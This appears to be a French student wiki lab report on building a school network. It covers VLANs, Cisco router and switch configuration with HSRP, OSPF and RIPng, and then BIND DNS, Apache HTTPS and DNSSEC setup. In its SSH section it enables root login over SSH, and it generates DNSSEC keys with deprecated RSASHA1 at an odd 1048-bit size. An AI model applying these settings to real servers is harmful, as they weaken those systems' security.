|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner à au commutateur une ip dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Management=====&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain Interface (BDI)&lt;br /&gt;
&lt;br /&gt;
HSRP: Hot standby router protocol [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus]&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation du réseau ===&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
